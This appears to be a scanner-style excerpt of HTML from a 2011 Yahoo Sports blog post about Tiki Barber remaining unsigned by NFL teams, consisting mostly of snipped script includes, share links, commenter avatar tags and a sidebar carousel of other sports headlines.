<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/eJx1kM0OgyAQhJ_IKqD8pA_TbIFULLCG1TT26av00F48bXbmy-xmJmoTZHj4cimsF5yz60SthYIr-fivuUA2Iq3F76pkqu8OldAGiLf7uiyYaXeUEYIfTvIuwBxhq9FKa9nXaEwJc7vR3CR0ddIIxTfL6BuyWOM1Gzg_oe3o7TPkg-oMFyfUHOyTapI0-oSJ8N4igvs-2LNBnp381TEobWodL4Tx2A038gO2NW8j.js?z&m"></script>
...[SNIP]...
<meta property="og:title" content="Tiki Barber remains unemployed and sad" />
<link rel="image_src" href="http://mit.zenfs.com/209/2011/09/TikiBag.jpg" />
<link rel="canonical" href="http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443" />
...[SNIP]...
<meta name="msapplication-task" content="name=Photos;action-uri=http://sports.yahoo.com/nfl/gallery;icon-uri=http://sports.yahoo.com/favicon.ico" />

<link rel="stylesheet" type="text/css" href="http://l.yimg.com/zz/combo?d/lib/media/phugc/mwphcom_r141.css&d/lib/yui/2.9.0/build/container/assets/skins/sam/container.css&d/lib/yui/2.9.0/build/fonts/fonts-min.css&d/lib/yui/2.9.0/build/reset/reset-min.css" />
</head>
...[SNIP]...
<h2 id="yahoo-image-logo"><img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-print-logo.png" alt="Yahoo! Sports" /></h2>
...[SNIP]...
<div id="ysp-hd">

<link type='text/css' rel='stylesheet' href='http://l.yimg.com/zz/combo?kx/ucs/uh/css/215/yunivhead-min.css&kx/ucs/uh/css/221/logo-min.css&kx/ucs/search/css/180/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css'/><style>
...[SNIP]...
</script><script id="load_wrapper" type="text/javascript" src="http://mi.adinterax.com/wrapper.js"></script>
...[SNIP]...
<!--Vendor: Factor TG, Format: Pixel, IO: 774106--><SCRIPT LANGUAGE="JavaScript" SRC="http://as1.suitesmart.com/99917/G15493.js?GID=15493"></SCRIPT>
...[SNIP]...
<a href="/nfl/blog/shutdown_corner" title="Shutdown Corner - NFL "><img src="http://l.yimg.com/a/i/us/sp/fn/ed/blog/rev/blogheader_shutdowncorner.jpg" alt="Shutdown Corner - NFL "></a>
...[SNIP]...
<p><img src="http://l.yimg.com/a/p/sp/editorial_image/ad/ad9eec7900e325e007145dabe8abc77a/tiki_barber_remains_unemployed_and_sad.jpg" width="270" /="/" align="right" src="http://mit.zenfs.com/209/2011/09/TikiBag.jpg" height="405" hspace="8" class="alignright size-full wp-image-6444" title="TikiBag" alt="Tiki Barber remains unemployed and sad">When Tiki Barber told HBO that <a href="http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-8217-s-return-to-football-is-a-trea?urn=nfl-wp2735">
...[SNIP]...
<p>Now that NFL rosters are set at 53, and Tiki Barber never got to sniff one, I hope that's not true. <a href="http://sportsillustrated.cnn.com/2011/writers/peter_king/09/05/laborday/1.html">According to Peter King at Sports Illustrated, Tiki isn't taking it well</a>
...[SNIP]...
<p>Where this will leave Tiki Barber the person, I don't know. He's also <a href="http://www.huffingtonpost.com/2011/08/30/tiki-barber-traci-lynn-johnson-engaged_n_942415.html">recently proposed to his girlfriend</a>
...[SNIP]...
="http://us.lrd.yahoo.com/_ylc=X3oDMTF0YjliOWY5BHRtX2RtZWNoA1RleHQgTGluawR0bV9sbmsDVTExNzE1MTUEdG1fbmV0A1lhaG9vBHRtX3BvcwNjZW50ZXI-/SIG=11mhsvns4/**http%3A//football.fantasysports.yahoo.com/f1/signup"><img src="http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1314989147.jpg" border="0" alt=""/></a>
...[SNIP]...
<br />
... <a href="http://yhoo.it/nxJyoy">Colts delay Jim Tressel's employment</a><br />
... <a href="http://yhoo.it/phyJNx">Video: The NFL's most critical offseason moves</a><br />
... <a href="http://yhoo.it/mSN2e5">High school wrestler's 9/11 tie to President Bush</a>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-digg}-->
<a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443&title=Tiki+Barber+remains+unemployed+and+sad&ts=1315312930" class="digg" title="Digg.com" target="_new"><strong>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-facebook}-->
<a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443&title=Tiki+Barber+remains+unemployed+and+sad&ts=1315312930" class="facebook" title="Facebook" target="_new"><strong>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-twitter}-->
<a href="http://twitter.com/home?status=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443" class="twitter" title="Twitter" target="_new"><strong>
...[SNIP]...
85/L=FZWRgGKIPE7pARpjTl.wjQCLMhd7ak5mFb0ACDiN/B=3EyaQmKJiSo-/J=1315313085685551/K=TVKeZm0ugXKNYFYgkLGeew/A=6418146/R=0/SIG=11j13n4o5/*http://football.fantasysports.yahoo.com/f1/signup" target="_blank"><img src="http://ads.yimg.com/a/a/ya/yahoo_sports8/yahoo!_fantasy_football11_smb_630x31.jpg" alt="click here" width="630" height="31" border="0"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_OA3RIOXRBGNLY2AQTW2YKVOOLI">

<img id="com_14641504_OA3RIOXRBGNLY2AQTW2YKVOOLI" class="imageloader_classname" width="48" height="48" alt="whitey" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48a.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_ZGAAUPA4UQ74QYKQM4FCHVUJ2Q">

<img id="com_14641496_ZGAAUPA4UQ74QYKQM4FCHVUJ2Q" class="imageloader_classname" width="48" height="48" alt="mcman44" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_FTLQMXZ2XX7F44ZPMMQOHWWURA">

<img id="com_14641490_FTLQMXZ2XX7F44ZPMMQOHWWURA" class="imageloader_classname" width="48" height="48" alt="JOEK" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48e.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_3XCD7V2IBRT43HCIJKHNWX4SZI">

<img id="com_14641475_3XCD7V2IBRT43HCIJKHNWX4SZI" class="imageloader_classname" width="48" height="48" alt="concerned citizen" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_LIMI7M6SXLQ42FGCL5XIGPOHOI">

<img id="com_14641471_LIMI7M6SXLQ42FGCL5XIGPOHOI" class="imageloader_classname" width="48" height="48" alt="Shelby" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_33CGMYSFB4K5BQKR3QB23X7DSI">

<img id="com_14641464_33CGMYSFB4K5BQKR3QB23X7DSI" class="imageloader_classname" width="48" height="48" alt="Bruce" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_IZRO2VV6RFWS7INK2VIVWBS46M">

<img id="com_14641463_IZRO2VV6RFWS7INK2VIVWBS46M" class="imageloader_classname" width="48" height="48" alt="thatgirl" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1AxKBKy6NAAEB-IFDFFA=.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_2DW3OMNCFZWIQQDTZ6AXB7AYWM">

<img id="com_14641458_2DW3OMNCFZWIQQDTZ6AXB7AYWM" class="imageloader_classname" width="48" height="48" alt="DICKENS" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_IZRO2VV6RFWS7INK2VIVWBS46M">

<img id="com_14641450_IZRO2VV6RFWS7INK2VIVWBS46M" class="imageloader_classname" width="48" height="48" alt="thatgirl" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1AxKBKy6NAAEB-IFDFFA=.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_VICKDI7FNMKYQ3QZZBP6HK6XTA">

<img id="com_14641448_VICKDI7FNMKYQ3QZZBP6HK6XTA" class="imageloader_classname" width="48" height="48" alt="Felix" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/49bb55e9i2197z/oRJR4kQ3c6RdFBJIcqizfmISUPs-/100/tn48.jpg?ciAa60QBO4C663dh);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_OLUNPBS7ETLZEMC4POMRFP2PPY">

<img id="com_14641444_OLUNPBS7ETLZEMC4POMRFP2PPY" class="imageloader_classname" width="48" height="48" alt="Dan Kraybill" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4c863964i912zul1re3/P6o2Zjs1eqiIcvvUrj0pF4b9HA--/2/tn48.jpg?ciAa60QBqrxsP3u8);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_6BDMBV63PK4OVIMAUYEQBEKQQI">

<img id="com_14641443_6BDMBV63PK4OVIMAUYEQBEKQQI" class="imageloader_classname" width="48" height="48" alt="RollOn2012ObamasOut" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_YVZTVM2UTKHMMSVGWCFFKYJOMQ">

<img id="com_14641428_YVZTVM2UTKHMMSVGWCFFKYJOMQ" class="imageloader_classname" width="48" height="48" alt="Randy" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4d0bb75fi42dzws105mud/wPKJsyAzbqB_yRiR0Oierg--/1/tn48.jpeg?ciAa60QBss8CKkPn);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_LBQQJENEWI7EGQJ7YZIEWFK34Y">

<img id="com_14641413_LBQQJENEWI7EGQJ7YZIEWFK34Y" class="imageloader_classname" width="48" height="48" alt="Russ" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_YKANDFIPI6ZJ3BHNKN4X4UV7GA">

<img id="com_14641407_YKANDFIPI6ZJ3BHNKN4X4UV7GA" class="imageloader_classname" width="48" height="48" alt="Bert" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/49bb6918if4az/bU1fIok3frQKtlLeu_Pmyw--/101/tn48.jpg?ciAa60QBeXVYnGD5);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_VNOFMKX3YQX6UWKYUQNH7Q2A3Y">

<img id="com_14641400_VNOFMKX3YQX6UWKYUQNH7Q2A3Y" class="imageloader_classname" width="48" height="48" alt="NeilD" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_6UTWJJBRCWSD6L2GW6LKQBVCLU">

<img id="com_14641399_6UTWJJBRCWSD6L2GW6LKQBVCLU" class="imageloader_classname" width="48" height="48" alt="Bud" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48a.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_VKH2NYGWOZAEWZRDXNTRU2NROE">

<img id="com_14641393_VKH2NYGWOZAEWZRDXNTRU2NROE" class="imageloader_classname" width="48" height="48" alt="Cherry Bear" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/13IW8dv7DAAECPiE_cIpQBl8B.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_CYAD7NHXP5RNOOAOUVF3W7YARY">

<img id="com_14641378_CYAD7NHXP5RNOOAOUVF3W7YARY" class="imageloader_classname" width="48" height="48" alt="Starcaster" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1jKNS1qBGAAECkcmcLb7TCA==.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_BKMWFVLSFHWQPIAR2WS7ZQVOV4">

<img id="com_14641370_BKMWFVLSFHWQPIAR2WS7ZQVOV4" class="imageloader_classname" width="48" height="48" alt="Greg" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1_z0fe50oAAEC2eT6KCAuBA==.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_ZR75SZTAKTX7ICZVKNZ6ZPCHPQ">

<img id="com_14641369_ZR75SZTAKTX7ICZVKNZ6ZPCHPQ" class="imageloader_classname" width="48" height="48" alt="Mr Zox" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48c.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_G2LWBYJFFIRFHKYTHNXS4QEJKY">

<img id="com_14641366_G2LWBYJFFIRFHKYTHNXS4QEJKY" class="imageloader_classname" width="48" height="48" alt="" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4c8ad496idb7zul2re3/cqg5RoE8erDAhvZCVf73KhhwEqQ-/9/tn48.jpg?ciAa60QB0X1WZnq0);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_TRZACYYXQX5Y2O24PMFQZ4YJEQ">

<img id="com_14641363_TRZACYYXQX5Y2O24PMFQZ4YJEQ" class="imageloader_classname" width="48" height="48" alt="Victor" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48c.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_KFR7CSJMD23L6SUBPBABCEZLUU">

<img id="com_14641362_KFR7CSJMD23L6SUBPBABCEZLUU" class="imageloader_classname" width="48" height="48" alt="Dave" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4cc87ca7i1b79zws133ac4/Tn_rkFo1erBUVIO0bdyNXIK0spwP/1/tn48.jpeg?ciAa60QBKdrswYJk);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_7CJUUBMQFZ3O6MCEHGOEKQLT5I">

<img id="com_14641361_7CJUUBMQFZ3O6MCEHGOEKQLT5I" class="imageloader_classname" width="48" height="48" alt="Of the domain of the only known" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48c.png);"></a>
...[SNIP]...
"http://sports.yahoo.com/nfl/news?slug=jc-cole_peyton_manning_colts_lockout090511&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Troubling health news for Peyton Manning">
<img src="http://l.yimg.com/iu/api/res/1.2/Dx8ad3BF8vfI6ktnGQZ2Pw--/YXBwaWQ9eXZpZGVvO2NoPTEyMDtjcj0xO2N3PTE4MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1315252981.jpg" title="Troubling health news for Peyton Manning" alt="Troubling health news for Peyton Manning" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-buddyryan-cancer&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Cancer won't stop Ryan">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
.com/nfl/blog/shutdown_corner/post/Shanahan-names-Rex-Grossman-Redskins-8217-Week?urn=nfl-wp6463&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Redskins name starting QB">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
oo.com/nfl/blog/shutdown_corner/post/Aaron-Rodgers-8217-handlebar-mustache-gives-hi?urn=nfl-wp6423&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="QB's impressive 'stache">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/big_league_stew/post/Jerome-Williams-The-Giants-called-me-8216-Jer?urn=mlb-wp18625&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="MLB player called wrong name for years">
<img src="http://l.yimg.com/iu/api/res/1.2/bL85hQglN3ttKnNb7aMbGA--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/williams-pd.jpg" title="MLB player called wrong name for years" alt="MLB player called wrong name for years" width="94" height="63">
</a>
...[SNIP]...
.com/mlb/blog/big_league_stew/post/Blue-Jays-scout-Japan-8217-s-Yu-Darvish-Is-he-?urn=mlb-wp18464&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Japanese pitching phenom">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mlb/news?slug=jp-passan_10_degrees_mvp_candidates_090411&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Comparing potential MVPs">
<img src="http://l.yimg.com/iu/api/res/1.2/.VekwHIL.XxGYmrIR79ckQ--/YXBwaWQ9eXZpZGVvO2NoPTE2MDtjcj0xO2N3PTI0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1315203022.jpg" title="Comparing potential MVPs" alt="Comparing potential MVPs" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-colts-manning&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Tough news for Peyton">
<img src="http://l.yimg.com/iu/api/res/1.2/4gYbQm9TOj0foLKTK6kJxw--/YXBwaWQ9eXZpZGVvO2NoPTE0Nztjcj0xO2N3PTIyMDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/08/ipt/1314681169.jpg" title="Tough news for Peyton" alt="Tough news for Peyton" width="94" height="63">
</a>
...[SNIP]...
utdown_corner/post/Colts-delay-Tressel-8217-s-employment-until-sev?urn=nfl-wp6446&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Jim Tressel punished by his new NFL boss">
<img src="http://l.yimg.com/iu/api/res/1.2/tcsbrnHu2XoIp0S0.Ckzsw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/tressel-pd.jpg" title="Jim Tressel punished by his new NFL boss" alt="Jim Tressel punished by his new NFL boss" width="94" height="63">
</a>
...[SNIP]...
ahoo.com/mlb/blog/big_league_stew/post/Pitcher-Milone-hits-home-run-on-first-pitch-he-s?urn=mlb-wp18507&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Rookie's rare feat">
<img src="http://l.yimg.com/iu/api/res/1.2/jpYINf57Jv1vBnQgFernXw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/troop-pd.jpg" title="Rookie's rare feat" alt="Rookie's rare feat" width="94" height="63">
</a>
...[SNIP]...
o.com/mlb/blog/big_league_stew/post/Umpire-West-goes-rogue-on-replay-in-Phillies-Mar?urn=mlb-wp18578&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Umpire's strange call">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
.com/mlb/blog/big_league_stew/post/Brewers-backup-catcher-George-Kottaras-hits-firs?urn=mlb-wp18532&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Catcher hits for cycle">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nascar/news?slug=ap-nascar-atlanta&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="NASCAR hopes bad weather gone by Tuesday">
<img src="http://l.yimg.com/iu/api/res/1.2/fY0ArNmEgARdXgW3VFOLkw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/crash1.jpg" title="NASCAR hopes bad weather gone by Tuesday" alt="NASCAR hopes bad weather gone by Tuesday" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nascar/news?slug=txnascarnationwide&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Edwards recovers, wins">
<img src="http://l.yimg.com/iu/api/res/1.2/KLKYfKOxh3ZdcnMCT15hfw--/YXBwaWQ9eXZpZGVvO2NoPTQyNTtjcj0xO2N3PTYzNDtkeD0xNDtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://d.yimg.com/a/p/sp/getty/b1/fullj.74236e574d6a4f7fa42887a424e4ecaf/74236e574d6a4f7fa42887a424e4ecaf-getty-107745401js007_11th_annual_.jpg" title="Edwards recovers, wins" alt="Edwards recovers, wins" width="94" height="63">
</a>
...[SNIP]...
post/Rafael-Nadal-collapses-at-post-match-press-confe?urn=ten-wp2948&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Rafael Nadal collapses at post-match press conference">
<img src="http://l.yimg.com/iu/api/res/1.2/p8QNXBH2ur9RxK3SSsdbug--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/nadal.jpg" title="Rafael Nadal collapses at post-match press conference" alt="Rafael Nadal collapses at post-match press conference" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/ten/news?slug=afp-tennis_usa_open_venuswilliams_20110904&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Venus thanks fans">
<img src="http://l.yimg.com/iu/api/res/1.2/SGDXAA_VYFh5N_Ix_DfK.g--/YXBwaWQ9eXZpZGVvO2NoPTE2NDtjcj0xO2N3PTI0NTtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ac/cf/fullj.e6fc1b4cfaefc628237dd6812cc3d4a6/0.jpg" title="Venus thanks fans" alt="Venus thanks fans" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/ten/news?slug=afp-tennis_usa_open_men_20110904&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Nadal in field of 16">
<img src="http://l.yimg.com/iu/api/res/1.2/rk8mzTCWVKirKboIUyXTDg--/YXBwaWQ9eXZpZGVvO2NoPTE2NDtjcj0xO2N3PTI0NTtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ac/cf/fullj.d830959be5676770fcf36656ad0b01f5/0.jpg" title="Nadal in field of 16" alt="Nadal in field of 16" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/ten/news?slug=ap-usopen-roddick&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Roddick looks strong">
<img src="http://l.yimg.com/iu/api/res/1.2/hTuM.plFCT5s1M65gp6zww--/YXBwaWQ9eXZpZGVvO2NoPTE0Nztjcj0xO2N3PTIyMDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/08/ipt/1314857213.jpg" title="Roddick looks strong" alt="Roddick looks strong" width="94" height="63">
</a>
...[SNIP]...
log/shutdown_corner/post/Former-Pats-safety-Brandon-Meriweather-leads-lis?urn=nfl-wp6406&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Prominent NFL players on the move">
<img src="http://l.yimg.com/iu/api/res/1.2/PXuMXOwJ2uaXo5fYsMtxbQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/cuts.jpg" title="Prominent NFL players on the move" alt="Prominent NFL players on the move" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=pfw-20110904_nfc_free_agent_moves_by_team_2&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Free agent moves">
<img src="http://l.yimg.com/iu/api/res/1.2/DO19w.oidtwvdIr1uvR..w--/YXBwaWQ9eXZpZGVvO2NoPTIzMDtjcj0xO2N3PTM0MztkeD0zOTtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://d.yimg.com/a/p/sp/pfw/72/fullj.d31be56e39031f27aa6903d7c8ccdb0b/20110904_nfc_free_agent_moves_0.jpg" title="Free agent moves" alt="Free agent moves" width="94" height="63">
</a>
...[SNIP]...
ttp://sports.yahoo.com/nfl/news?slug=nfp-20110904_mark_herzlich_beats_the_odds_makes_giants_roster&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Herzlich beats the odds">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-leeroyselmon&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Selmon is improving">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/top/news?slug=ap-worlds-semenya&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="South African runner's valiant return">
<img src="http://l.yimg.com/iu/api/res/1.2/1J1FJn2FsGUNJqTveVRpJQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/semenya.jpg" title="South African runner's valiant return" alt="South African runner's valiant return" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/top/news?slug=ap-worlds&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Bolt, Jamaica take gold">
<img src="http://l.yimg.com/iu/api/res/1.2/97klez0UFQMbKD7UV7d0.Q--/YXBwaWQ9eXZpZGVvO2NoPTI5NDtjcj0xO2N3PTQ0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ap/e5/fullj.7d1639ed4877ae02a0cee5b1991a05fe/ap-201109020839311726658.jpg" title="Bolt, Jamaica take gold" alt="Bolt, Jamaica take gold" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/olympics/news?slug=ap-2020bids&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Six bid for 2020 Olympics">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/top/news?slug=reu-worldmentriple_jump_pix&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="American pulls upset">
